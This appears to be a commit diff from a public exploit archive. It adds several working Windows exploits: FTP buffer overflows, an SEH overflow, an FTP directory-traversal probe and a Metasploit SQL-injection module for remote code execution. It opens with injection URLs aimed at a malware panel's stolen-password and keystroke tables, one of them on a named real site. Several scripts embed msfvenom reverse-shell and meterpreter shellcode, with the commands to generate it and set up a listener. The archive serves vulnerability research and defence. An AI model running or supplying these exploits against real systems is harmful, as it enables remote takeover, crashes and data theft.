http://127.0.0.1/WebPanel/server_side/scripts/server_processing.php?table=passwords&primary=password_id&clmns=a%3A6%3A%7Bi%3A0%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A11%3A%22server_time%22%3Bs%3A2%3A%22dt%22%3Bs%3A11%3A%22server_time%22%3B%7Di%3A1%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A7%3A%22pc_name%22%3Bs%3A2%3A%22dt%22%3Bs%3A7%3A%22pc_name%22%3B%7Di%3A2%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A6%3A%22client%22%3Bs%3A2%3A%22dt%22%3Bs%3A6%3A%22client%22%3B%7Di%3A3%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A4%3A%22host%22%3Bs%3A2%3A%22dt%22%3Bs%3A4%3A%22host%22%3B%7Di%3A4%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A8%3A%22username%22%3Bs%3A2%3A%22dt%22%3Bs%3A8%3A%22username%22%3B%7Di%3A5%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A3%3A%22pwd%22%3Bs%3A2%3A%22dt%22%3Bs%3A3%3A%22pwd%22%3B%7D%7D
PoC Extract full Keystrokes:
http://etvidanueva.com/photos/images/WebPanel/server_side/scripts/server_processing.php?table=logs&primary=log_id&clmns=a%3A6%3A%7Bi%3A0%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A6%3A%22log_id%22%3Bs%3A2%3A%22dt%22%3Bs%3A6%3A%22log_id%22%3B%7Di%3A1%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A11%3A%22server_time%22%3Bs%3A2%3A%22dt%22%3Bs%3A11%3A%22server_time%22%3B%7Di%3A2%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A4%3A%22hwid%22%3Bs%3A2%3A%22dt%22%3Bs%3A4%3A%22hwid%22%3B%7Di%3A3%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A7%3A%22pc_name%22%3Bs%3A2%3A%22dt%22%3Bs%3A7%3A%22pc_name%22%3B%7Di%3A4%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A3%3A%22log%22%3Bs%3A2%3A%22dt%22%3Bs%3A3%3A%22log%22%3B%7Di%3A5%3Ba%3A2%3A%7Bs%3A2%3A%22db%22%3Bs%3A9%3A%22ip_addres%22%3Bs%3A2%3A%22dt%22%3Bs%3A9%3A%22ip_addres%22%3B%7D%7D

100
exploits/windows/dos/46535.txt
View file

@ -1,6 +1,6 @@
# Exploit Title: CoreFTP Server FTP / SFTP Server v2 - Build 674 SIZE Directory Traversal
# Google Dork: N/A
# Date: 3/13/2019
# Date: 4/27/2019
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www.coreftp.com
# Software Link: http://www.coreftp.com/server/index.html
@ -8,34 +8,78 @@
# Tested on: Windows 7
# CVE : CVE-2019-9648
*Vendor has confirmed vulnerability and implemented an updated version*
Summary: By utilizing a directory traversal along with the FTP SIZE command, an attacker can browse outside the root directory to determine if a file exists based on return file size by using a ..\..\ technique
Tools used:
Parrot OS VM
Windows 7 VM
FTP / SFTP Server v2 - Build 674
Netcat
#!/usr/bin/python
Proof of Concept (PoC):
import socket
import sys
File 1: ARP.exe
Type of file: Application(.EXE)
Description: TCP/IP Arp Command
Location: C:\Windows\System32\
Size: 20.5 KB (20,992 bytes)
Size on disk: 24.0 KB (24,576 bytes)
Created: Monday July 13, 2009 7:55:11 PM
Modified: Monday July 13, 2009, 9:14:12 PM
Accessed: Monday July 13, 2009 7:55:11 PM
########################################################
###########Set Variables For Script Here################
#nc -nv 192.168.0.2 21
(UNKNOWN) [192.168.0.2] 21 (ftp) open
220 Core FTP Server Version 2.0, build 674, 32-bit, installed 1 days ago Unregistered
USER anonymous
331 password required for anonymous
PASS anonymous@
230-Logged on
230
SIZE C:\..\..\..\..\..\..\Windows\System32\ARP.exe
213 20992
file_to_look_for = "nslookup.exe"
local_disk_drive = " C:"
path_traversal = "\..\..\..\..\..\Windows\System32\\"
########################################################
print ("""
##### # # ####### ##### ### # ##### ##### ##### # #####
# # # # # # # # # ## # # # # # # # # # #
# # # # # # # # # # # # # # # # # #
# # # ##### ##### ##### # # # ###### ##### ###### ###### # # #####
# # # # # # # # # # # # ####### # #
# # # # # # # # # # # # # # # # # #
##### # ####### ####### ### ##### ##### ##### ##### # #####
#######
# # # ##### # #### # #####
# # # # # # # # # #
##### ## # # # # # # #
# ## ##### # # # # #
# # # # # # # # #
####### # # # ###### #### # #
# # ###### # # #
# # # ##### # ##### ##### ###### # # # # # # ### # # ###### # # # # #
# # # # # # # # # ## # # # # # # # # # # # # ## #
# # # # # # # # ##### # # # ###### # ### ##### # # # # # #
# # # ##### # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # ## # # # ### # # # # # # # ##
## ## # # # # # ###### # # ###### # # # # ###### ## # # #
######
# # ## # # ##### ## # #
# # # # ## # # # # # # #
###### # # # # # # # # # # #
# # ###### # # # # # ###### # #
# # # # # ## # # # # # #
# # # # # # ##### # # ###### ######
""")
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect = s.connect(('192.168.0.4',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.recv(1024)
s.send('SIZE' +local_disk_drive+path_traversal+file_to_look_for + '\r\n')
result = s.recv(2048)
trimmedoutput = result.strip()
splitoutput = trimmedoutput.split(' ')
realresult = unicode (trimmedoutput,'utf-8')
realresult2 = unicode (splitoutput[1],'utf-8')
isnum = realresult.isnumeric()
isnum2 = realresult2.isnumeric()
if isnum2:
print "The file " + file_to_look_for + " exist on the remote server. Here is the filesize:" + splitoutput[1]
else:
print "The file " + file_to_look_for + " does not exist on the remote server or one of the variables declared is incorrect."
s.send('QUIT\r\n')
s.close

23
exploits/windows/dos/46778.py Executable file
View file

@ -0,0 +1,23 @@
#Exploit Title: SpotAuditor 5.2.6 - 'Name' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-04-27
#Vendor Homepage: www.nsauditor.com
#Software Link: http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
#Tested Version: 5.2.6
#Tested on: Windows Windows 10 Single Language x64 / 7 x64 Service Pack 1
#Steps to produce the crash:
#1.- Run python code: Spotauditor_name_5.2.6.py
#2.- Open Spotauditor_name.txt and copy content to clipboard
#3.- Open SpotAuditor
#4.- Select "Register" > "Enter Registration Code..."
#5.- In "Name" paste Clipboard
#6.- In Key type "test"
#7.- Click "Ok"
#8.- Crarshed
cod = "\x41" * 300
f = open('Spotauditor_name.txt', 'w')
f.write(cod)
f.close()

76
exploits/windows/local/46779.py Executable file
View file

@ -0,0 +1,76 @@
# Exploit Title: DeviceViewer v3.12.0.1 username field SEH overflow (PoC)
# Discovery Date: 25/04/2019
# Exploit Author: Hayden Wright
# Vendor Homepage: www.sricam.com/
# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
# Version: v3.12.0.1
# Tested on: Windows XP Pro x64, Windows 7 32bit
# CVE : CVE-2019-11563
#!/usr/bin/python
import struct
#------------------------------------------------------------#
# CVE-2019-11563 #
# #
# Sricam DeviceViewer.exe 'username' field SEH overflow #
# by Hayden Wright #
# #
# (*) badchars = '\x00\x0a\x0d' #
# (*) SEH = 0x6a413969 OFFSET 268 #
# (*) nSEH = 268 -4 #
# #
# 69901d06 5E POP ESI #
# 69901d07 5F POP EDI #
# 69901d08 C3 RETN #
# #
#------------------------------------------------------------#
#msfvenom -p windows/shell_reverse_tcp lport=1234 lhost=192.168.1.101 -f c -b '\x00\x0a\x0d' -a x86 --platform windows EXITFUNC=seh
shellcode =(
"\xb8\x51\x9c\x1c\xa4\xda\xc9\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x52\x31\x42\x12\x83\xea\xfc\x03\x13\x92\xfe\x51\x6f\x42\x7c"
"\x99\x8f\x93\xe1\x13\x6a\xa2\x21\x47\xff\x95\x91\x03\xad\x19"
"\x59\x41\x45\xa9\x2f\x4e\x6a\x1a\x85\xa8\x45\x9b\xb6\x89\xc4"
"\x1f\xc5\xdd\x26\x21\x06\x10\x27\x66\x7b\xd9\x75\x3f\xf7\x4c"
"\x69\x34\x4d\x4d\x02\x06\x43\xd5\xf7\xdf\x62\xf4\xa6\x54\x3d"
"\xd6\x49\xb8\x35\x5f\x51\xdd\x70\x29\xea\x15\x0e\xa8\x3a\x64"
"\xef\x07\x03\x48\x02\x59\x44\x6f\xfd\x2c\xbc\x93\x80\x36\x7b"
"\xe9\x5e\xb2\x9f\x49\x14\x64\x7b\x6b\xf9\xf3\x08\x67\xb6\x70"
"\x56\x64\x49\x54\xed\x90\xc2\x5b\x21\x11\x90\x7f\xe5\x79\x42"
"\xe1\xbc\x27\x25\x1e\xde\x87\x9a\xba\x95\x2a\xce\xb6\xf4\x22"
"\x23\xfb\x06\xb3\x2b\x8c\x75\x81\xf4\x26\x11\xa9\x7d\xe1\xe6"
"\xce\x57\x55\x78\x31\x58\xa6\x51\xf6\x0c\xf6\xc9\xdf\x2c\x9d"
"\x09\xdf\xf8\x32\x59\x4f\x53\xf3\x09\x2f\x03\x9b\x43\xa0\x7c"
"\xbb\x6c\x6a\x15\x56\x97\xfd\xda\x0f\x96\x98\xb2\x4d\x98\x66"
"\x91\xdb\x7e\x0c\x05\x8a\x29\xb9\xbc\x97\xa1\x58\x40\x02\xcc"
"\x5b\xca\xa1\x31\x15\x3b\xcf\x21\xc2\xcb\x9a\x1b\x45\xd3\x30"
"\x33\x09\x46\xdf\xc3\x44\x7b\x48\x94\x01\x4d\x81\x70\xbc\xf4"
"\x3b\x66\x3d\x60\x03\x22\x9a\x51\x8a\xab\x6f\xed\xa8\xbb\xa9"
"\xee\xf4\xef\x65\xb9\xa2\x59\xc0\x13\x05\x33\x9a\xc8\xcf\xd3"
"\x5b\x23\xd0\xa5\x63\x6e\xa6\x49\xd5\xc7\xff\x76\xda\x8f\xf7"
"\x0f\x06\x30\xf7\xda\x82\x4e\x09\xd6\x1e\xc6\xb0\x83\x62\x8a"
"\x42\x7e\xa0\xb3\xc0\x8a\x59\x40\xd8\xff\x5c\x0c\x5e\xec\x2c"
"\x1d\x0b\x12\x82\x1e\x1e")
max_size = 4000
buf = 'A'*264
buf += '\xeb\x06\x90\x90' #jump short 6-bytes
buf += struct.pack('<I', 0x69901d06) #POP ESI, POP EDI, RET avformat-54.dll
buf += '\x90' * 16
buf += shellcode
buf += 'C'*(max_size - len(buf))
print '[+] %s bytes buffer created...' %len(buf)
try:
filename = 'CVE-2019-11563.txt'
file = open(filename , 'w')
file.write(buf)
print '[+] Evil buffer saved to file: ' + filename
print '[+] Copy + paste its contents into the "user" field and hit login'
file.close()
except:
print "[!] Could not create file!"

71
exploits/windows/remote/46762.py Executable file
View file

@ -0,0 +1,71 @@
# Exploit Title: Free Float FTP 1.0 "SIZE" Remote Buffer Overflow
# Google Dork: N/A
# Date: 4/26/2019
# Exploit Author: Kevin Randall
# Vendor Homepage:
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Version: Firmware: Free Float FTP 1.0
# Tested on: Windows XP Professional Service Pack 2
# CVE : N/A
#Generate Shellcode with MSFVenom
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP.OF.LOCAL.MACHINE LPORT=4444 -b '\x00\x0A\x0D' -f python
#Setup listener "use exploit/multi/handler" "set payload windows/meterpreter/reverse_tcp" "set LHOST IP.OF.LOCAL.MACHINE" "set LPORT 4444" "exploit"
#!/usr/bin/python
import socket
import sys
buf = ""
buf += "\xba\x99\x2c\xb1\x7d\xdb\xd1\xd9\x74\x24\xf4\x5d\x2b"
buf += "\xc9\xb1\x56\x31\x55\x13\x83\xed\xfc\x03\x55\x96\xce"
buf += "\x44\x81\x40\x8c\xa7\x7a\x90\xf1\x2e\x9f\xa1\x31\x54"
buf += "\xeb\x91\x81\x1e\xb9\x1d\x69\x72\x2a\x96\x1f\x5b\x5d"
buf += "\x1f\x95\xbd\x50\xa0\x86\xfe\xf3\x22\xd5\xd2\xd3\x1b"
buf += "\x16\x27\x15\x5c\x4b\xca\x47\x35\x07\x79\x78\x32\x5d"
buf += "\x42\xf3\x08\x73\xc2\xe0\xd8\x72\xe3\xb6\x53\x2d\x23"
buf += "\x38\xb0\x45\x6a\x22\xd5\x60\x24\xd9\x2d\x1e\xb7\x0b"
buf += "\x7c\xdf\x14\x72\xb1\x12\x64\xb2\x75\xcd\x13\xca\x86"
buf += "\x70\x24\x09\xf5\xae\xa1\x8a\x5d\x24\x11\x77\x5c\xe9"
buf += "\xc4\xfc\x52\x46\x82\x5b\x76\x59\x47\xd0\x82\xd2\x66"
buf += "\x37\x03\xa0\x4c\x93\x48\x72\xec\x82\x34\xd5\x11\xd4"
buf += "\x97\x8a\xb7\x9e\x35\xde\xc5\xfc\x51\x13\xe4\xfe\xa1"
buf += "\x3b\x7f\x8c\x93\xe4\x2b\x1a\x9f\x6d\xf2\xdd\x96\x7a"
buf += "\x05\x31\x10\xea\xfb\xb2\x60\x22\x38\xe6\x30\x5c\xe9"
buf += "\x87\xdb\x9c\x16\x52\x71\x97\x80\x9d\x2d\xa7\x52\x76"
buf += "\x2f\xa8\x43\xda\xa6\x4e\x33\xb2\xe8\xde\xf4\x62\x48"
buf += "\x8f\x9c\x68\x47\xf0\xbd\x92\x82\x99\x54\x7d\x7a\xf1"
buf += "\xc0\xe4\x27\x89\x71\xe8\xf2\xf7\xb2\x62\xf6\x08\x7c"
buf += "\x83\x73\x1b\x69\xf4\x7b\xe3\x6a\x91\x7b\x89\x6e\x33"
buf += "\x2c\x25\x6d\x62\x1a\xea\x8e\x41\x19\xed\x71\x14\x2b"
buf += "\x85\x44\x82\x13\xf1\xa8\x42\x93\x01\xff\x08\x93\x69"
buf += "\xa7\x68\xc0\x8c\xa8\xa4\x75\x1d\x3d\x47\x2f\xf1\x96"
buf += "\x2f\xcd\x2c\xd0\xef\x2e\x1b\x62\xf7\xd0\xd9\x4d\x50"
buf += "\xb8\x21\xce\x60\x38\x48\xce\x30\x50\x87\xe1\xbf\x90"
buf += "\x68\x28\xe8\xb8\xe3\xbd\x5a\x59\xf3\x97\x3b\xc7\xf4"
buf += "\x14\xe0\xf8\x8f\x55\x17\xf9\x6f\x7c\x7c\xfa\x6f\x80"
buf += "\x82\xc7\xb9\xb9\xf0\x06\x7a\xfe\x0b\x3d\xdf\x57\x86"
buf += "\x3d\x73\xa7\x83"
shellcode = '\x90'*20 + buf
payload = "A"*247+"\xF6\xC1\xB3\x7C"+ shellcode +"C"*(749-len(shellcode))
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
##Add FTP Server IP Here###############
connect = s.connect(('192.168.0.9',21))
#######################################
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('SIZE' + payload + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close()

72
exploits/windows/remote/46763.py Executable file
View file

@ -0,0 +1,72 @@
# Exploit Title: Free Float FTP 1.0 "STOR" Remote Buffer Overflow
# Google Dork: N/A
# Date: 4/26/2019
# Exploit Author: Kevin Randall
# Vendor Homepage:
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Version: Firmware: Free Float FTP 1.0
# Tested on: Windows XP Professional Service Pack 2
# CVE : N/A
#Generate Shellcode with MSFVenom
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP.OF.LOCAL.MACHINE LPORT=4444 -b '\x00\x0A\x0D' -f python
#Setup listener "use exploit/multi/handler" "set payload windows/meterpreter/reverse_tcp" "set LHOST IP.OF.LOCAL.MACHINE" "set LPORT 4444" "exploit"
#!/usr/bin/python
import socket
import sys
buf = ""
buf += "\xba\x99\x2c\xb1\x7d\xdb\xd1\xd9\x74\x24\xf4\x5d\x2b"
buf += "\xc9\xb1\x56\x31\x55\x13\x83\xed\xfc\x03\x55\x96\xce"
buf += "\x44\x81\x40\x8c\xa7\x7a\x90\xf1\x2e\x9f\xa1\x31\x54"
buf += "\xeb\x91\x81\x1e\xb9\x1d\x69\x72\x2a\x96\x1f\x5b\x5d"
buf += "\x1f\x95\xbd\x50\xa0\x86\xfe\xf3\x22\xd5\xd2\xd3\x1b"
buf += "\x16\x27\x15\x5c\x4b\xca\x47\x35\x07\x79\x78\x32\x5d"
buf += "\x42\xf3\x08\x73\xc2\xe0\xd8\x72\xe3\xb6\x53\x2d\x23"
buf += "\x38\xb0\x45\x6a\x22\xd5\x60\x24\xd9\x2d\x1e\xb7\x0b"
buf += "\x7c\xdf\x14\x72\xb1\x12\x64\xb2\x75\xcd\x13\xca\x86"
buf += "\x70\x24\x09\xf5\xae\xa1\x8a\x5d\x24\x11\x77\x5c\xe9"
buf += "\xc4\xfc\x52\x46\x82\x5b\x76\x59\x47\xd0\x82\xd2\x66"
buf += "\x37\x03\xa0\x4c\x93\x48\x72\xec\x82\x34\xd5\x11\xd4"
buf += "\x97\x8a\xb7\x9e\x35\xde\xc5\xfc\x51\x13\xe4\xfe\xa1"
buf += "\x3b\x7f\x8c\x93\xe4\x2b\x1a\x9f\x6d\xf2\xdd\x96\x7a"
buf += "\x05\x31\x10\xea\xfb\xb2\x60\x22\x38\xe6\x30\x5c\xe9"
buf += "\x87\xdb\x9c\x16\x52\x71\x97\x80\x9d\x2d\xa7\x52\x76"
buf += "\x2f\xa8\x43\xda\xa6\x4e\x33\xb2\xe8\xde\xf4\x62\x48"
buf += "\x8f\x9c\x68\x47\xf0\xbd\x92\x82\x99\x54\x7d\x7a\xf1"
buf += "\xc0\xe4\x27\x89\x71\xe8\xf2\xf7\xb2\x62\xf6\x08\x7c"
buf += "\x83\x73\x1b\x69\xf4\x7b\xe3\x6a\x91\x7b\x89\x6e\x33"
buf += "\x2c\x25\x6d\x62\x1a\xea\x8e\x41\x19\xed\x71\x14\x2b"
buf += "\x85\x44\x82\x13\xf1\xa8\x42\x93\x01\xff\x08\x93\x69"
buf += "\xa7\x68\xc0\x8c\xa8\xa4\x75\x1d\x3d\x47\x2f\xf1\x96"
buf += "\x2f\xcd\x2c\xd0\xef\x2e\x1b\x62\xf7\xd0\xd9\x4d\x50"
buf += "\xb8\x21\xce\x60\x38\x48\xce\x30\x50\x87\xe1\xbf\x90"
buf += "\x68\x28\xe8\xb8\xe3\xbd\x5a\x59\xf3\x97\x3b\xc7\xf4"
buf += "\x14\xe0\xf8\x8f\x55\x17\xf9\x6f\x7c\x7c\xfa\x6f\x80"
buf += "\x82\xc7\xb9\xb9\xf0\x06\x7a\xfe\x0b\x3d\xdf\x57\x86"
buf += "\x3d\x73\xa7\x83"
shellcode = '\x90'*20 + buf
payload = "A"*247+"\xF6\xC1\xB3\x7C"+ shellcode +"C"*(749-len(shellcode))
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
##Add FTP Server IP Here###############
connect = s.connect(('192.168.0.9',21))
#######################################
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('STOR' + payload + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close()

135
exploits/windows/remote/46782.rb Executable file
View file

@ -0,0 +1,135 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::MSSQL_COMMANDS
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'AIS logistics ESEL-Server Unauth SQL Injection RCE',
'Description' => %q{
This module will execute an arbitrary payload on an "ESEL" server used by the
AIS logistic software. The server typically listens on port 5099 without TLS.
There could also be server listening on 5100 with TLS but the port 5099 is
usually always open.
The login process is vulnerable to an SQL Injection. Usually a MSSQL Server
with the 'sa' user is in place.
This module was verified on version 67 but it should also run on lower versions.
An fixed version was created by AIS in September 2017. However most systems
have not been updated.
In regard to the payload, unless there is a closed port in the web server,
you dont want to use any "bind" payload. You want a "reverse" payload,
probably to your port 80 or to any other outbound port allowed on the firewall.
Currently, one delivery method is supported
This method takes advantage of the Command Stager subsystem. This allows using
various techniques, such as using a TFTP server, to send the executable. By default
the Command Stager uses 'wcsript.exe' to generate the executable on the target.
NOTE: This module will leave a payload executable on the target system when the
attack is finished.
},
'Author' =>
[
'Manuel Feifel'
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-10123'],
],
'Platform' => 'win',
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Payload' =>
{
'BadChars' => "\x00\xff\x27",
},
'Targets' =>
[
[ 'Automatic', { } ],
],
'CmdStagerFlavor' => 'vbs',
'DefaultTarget' => 0,
'DisclosureDate' => '2019-03-27',
'DefaultOptions' =>
{
'RPORT' => 5099
},
))
end
# This is method required for the CmdStager to work...
def execute_command(cmd, _opts)
cmd_xp = "EXEC master..xp_cmdshell '#{cmd}'"
send_login_msg(create_login_msg_sql(cmd_xp))
end
# prepends the required length to the message and sends it to the server
def send_login_msg(login_msg, check_response = true)
length = login_msg.length
length += length.to_s.length
login_msg = "#{length}#{login_msg}"
connect
sock.put(login_msg)
response = sock.recv(10000)
if check_response
if (response.include? 'Zugangsdaten Falsch') && (response.length > (length - 20))
print_good('Correct response received => Data send successfully')
else
print_warning('Wrong response received => Probably data could not be sent successfully')
end
end
return response
ensure
# Every time a new Connection is required
disconnect
end
# embeds a sql command into the login message
def create_login_msg_sql(sql_cmd)
return create_login_msg("#{rand(1_000..9_999)}'; #{sql_cmd}--")
end
# create a plain login message
def create_login_msg(pw)
delim = "\xFF"
login_str = "#{delim}000000#{delim}20180810213226#{delim}01#{delim}60"\
"#{delim}02#{delim}1111#{delim}#{pw}#{delim}AAAAA#{delim}120"
end
def check
int = rand(1..1_000)
response_bypass = send_login_msg(create_login_msg("#{rand(1_000..9_999)}' OR #{int}=#{int}--"), false)
if response_bypass.include? 'Zugangsdaten OK'
CheckCode::Vulnerable
else
print_status("Response was: #{response_bypass}")
CheckCode::Safe
end
end
def exploit
# enable xp cmdshell, used to execute commands later
# Software uses the 'sa' user by default
send_login_msg(create_login_msg_sql(mssql_xpcmdshell_enable))
# The porotocol has no limites on max-data
execute_cmdstager({ :linemax => 1500 })
print_warning('The payload is left on the client in the \%TEMP\% Folder of the corresponding user.')
print_status('Stager should now be executed.')
end
end

55
exploits/windows/webapps/46780.py Executable file
View file

File diff suppressed because one or more lines are too long

26
files_exploits.csv
View file

@ -6296,7 +6296,7 @@ id,file,description,date,author,type,platform,port
46304,exploits/windows/dos/46304.py,"Remote Process Explorer 1.0.0.16 - Buffer Overflow (PoC) (SEH Overwrite)",2019-02-01,"Rafael Pedrero",dos,windows,
46309,exploits/windows/dos/46309.py,"MyVideoConverter Pro 3.14 - Denial of Service",2019-02-04,Achilles,dos,windows,
46312,exploits/windows/dos/46312.py,"River Past Ringtone Converter 2.7.6.1601 - Denial of Service (PoC)",2019-02-04,"Rafael Pedrero",dos,windows,
46313,exploits/windows/dos/46313.py,"SpotAuditor 3.6.7 - Denial of Service (PoC)",2019-02-04,"Rafael Pedrero",dos,windows,
46313,exploits/windows/dos/46313.py,"SpotAuditor 3.6.7 - 'Base64 Encrypted Password' Denial of Service (PoC)",2019-02-04,"Rafael Pedrero",dos,windows,
46314,exploits/windows/dos/46314.py,"TaskInfo 8.2.0.280 - Denial of Service (PoC)",2019-02-04,"Rafael Pedrero",dos,windows,
46321,exploits/windows/dos/46321.py,"Device Monitoring Studio 8.10.00.8925 - Denial of Service (PoC)",2019-02-05,"Victor Mondragón",dos,windows,
46322,exploits/windows/dos/46322.py,"River Past Audio Converter 7.7.16 - Denial of Service (PoC)",2019-02-05,Achilles,dos,windows,
@ -6405,6 +6405,8 @@ id,file,description,date,author,type,platform,port
46757,exploits/windows/dos/46757.py,"NSauditor 3.1.2.0 - 'Community' Denial of Service (PoC)",2019-04-26,"Victor Mondragón",dos,windows,
46758,exploits/windows/dos/46758.py,"NSauditor 3.1.2.0 - 'Name' Denial of Service (PoC)",2019-04-26,"Victor Mondragón",dos,windows,
46760,exploits/linux/dos/46760.txt,"systemd - DynamicUser can Create setuid Binaries when Assisted by Another Process",2019-04-26,"Google Security Research",dos,linux,
46778,exploits/windows/dos/46778.py,"SpotAuditor 5.2.6 - 'Name' Denial of Service (PoC)",2019-04-30,"Victor Mondragón",dos,windows,
46781,exploits/linux/dos/46781.txt,"Linux - Missing Locking Between ELF coredump code and userfaultfd VMA Modification",2019-04-30,"Google Security Research",dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10389,7 +10391,7 @@ id,file,description,date,author,type,platform,port
46290,exploits/windows/local/46290.py,"UltraISO 9.7.1.3519 - 'Output FileName' Local Buffer Overflow (SEH)",2019-01-31,"Dino Covotsos",local,windows,
46301,exploits/windows/local/46301.py,"PassFab Excel Password Recovery 8.3.1 - SEH Local Exploit",2019-02-01,Achilles,local,windows,
46331,exploits/windows/local/46331.py,"River Past Audio Converter 7.7.16 - Buffer Overflow (SEH)",2019-02-06,"Matteo Malvica",local,windows,
46334,exploits/windows/local/46334.py,"IP-Tools 2.5 - Local Buffer Overflow (SEH) (Egghunter)",2019-02-11,"Juan Prescotto",local,windows,
46334,exploits/windows/local/46334.py,"IP-Tools 2.5 - 'Log to file' Local Buffer Overflow (SEH) (Egghunter)",2019-02-11,"Juan Prescotto",local,windows,
46335,exploits/windows/local/46335.py,"River Past Cam Do 3.7.6 - Local Buffer Overflow (SEH)",2019-02-11,Achilles,local,windows,
46341,exploits/linux/local/46341.rb,"Evince - CBT File Command Injection (Metasploit)",2019-02-11,Metasploit,local,linux,
46345,exploits/windows/local/46345.py,"Avast Anti-Virus < 19.1.2360 - Local Credentials Disclosure",2019-02-11,"Nathu Nandwani",local,windows,
@ -10447,6 +10449,7 @@ id,file,description,date,author,type,platform,port
46747,exploits/windows/local/46747.txt,"VirtualBox 6.0.4 r128413 - COM RPC Interface Code Injection Host Privilege Escalation",2019-04-24,"Google Security Research",local,windows,
46755,exploits/windows/local/46755.py,"Lavavo CD Ripper 4.20 - 'License Activation Name' Buffer Overflow (SEH)",2019-04-25,Achilles,local,windows,
46756,exploits/windows/local/46756.rb,"RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)",2019-04-25,Metasploit,local,windows,
46779,exploits/windows/local/46779.py,"DeviceViewer 3.12.0.1 - 'user' SEH Overflow",2019-04-30,"Hayden Wright",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17366,6 +17369,11 @@ id,file,description,date,author,type,platform,port
46731,exploits/multiple/remote/46731.rb,"Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)",2019-04-19,Metasploit,remote,multiple,
46740,exploits/multiple/remote/46740.rb,"ManageEngine Applications Manager 14.0 - Authentication Bypass / Remote Command Execution (Metasploit)",2019-04-22,AkkuS,remote,multiple,
46748,exploits/multiple/remote/46748.txt,"Google Chrome 72.0.3626.121 / 74.0.3725.0 - 'NewFixedDoubleArray' Integer Overflow",2019-04-24,"Google Security Research",remote,multiple,
46762,exploits/windows/remote/46762.py,"Freefloat FTP Server 1.0 - 'SIZE' Remote Buffer Overflow",2019-04-30,"Kevin Randall",remote,windows,21
46763,exploits/windows/remote/46763.py,"Freefloat FTP Server 1.0 - 'STOR' Remote Buffer Overflow",2019-04-30,"Kevin Randall",remote,windows,21
46775,exploits/php/remote/46775.rb,"Moodle 3.6.3 - 'Install Plugin' Remote Command Execution (Metasploit)",2019-04-30,AkkuS,remote,php,
46782,exploits/windows/remote/46782.rb,"AIS logistics ESEL-Server - Unauth SQL Injection RCE (Metasploit)",2019-04-30,Metasploit,remote,windows,
46783,exploits/php/remote/46783.rb,"Pimcore < 5.71 - Unserialize RCE (Metasploit)",2019-04-30,Metasploit,remote,php,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -41193,3 +41201,17 @@ id,file,description,date,author,type,platform,port
46751,exploits/hardware/webapps/46751.txt,"JioFi 4G M2S 1.0.2 - 'mask' Cross-Site Scripting",2019-04-25,"Vikas Chaudhary",webapps,hardware,
46753,exploits/php/webapps/46753.txt,"osTicket 1.11 - Cross-Site Scripting / Local File Inclusion",2019-04-25,AkkuS,webapps,php,80
46759,exploits/java/webapps/46759.txt,"Apache Pluto 3.0.0 / 3.0.1 - Persistent Cross-Site Scripting",2019-04-26,"Dhiraj Mishra",webapps,java,
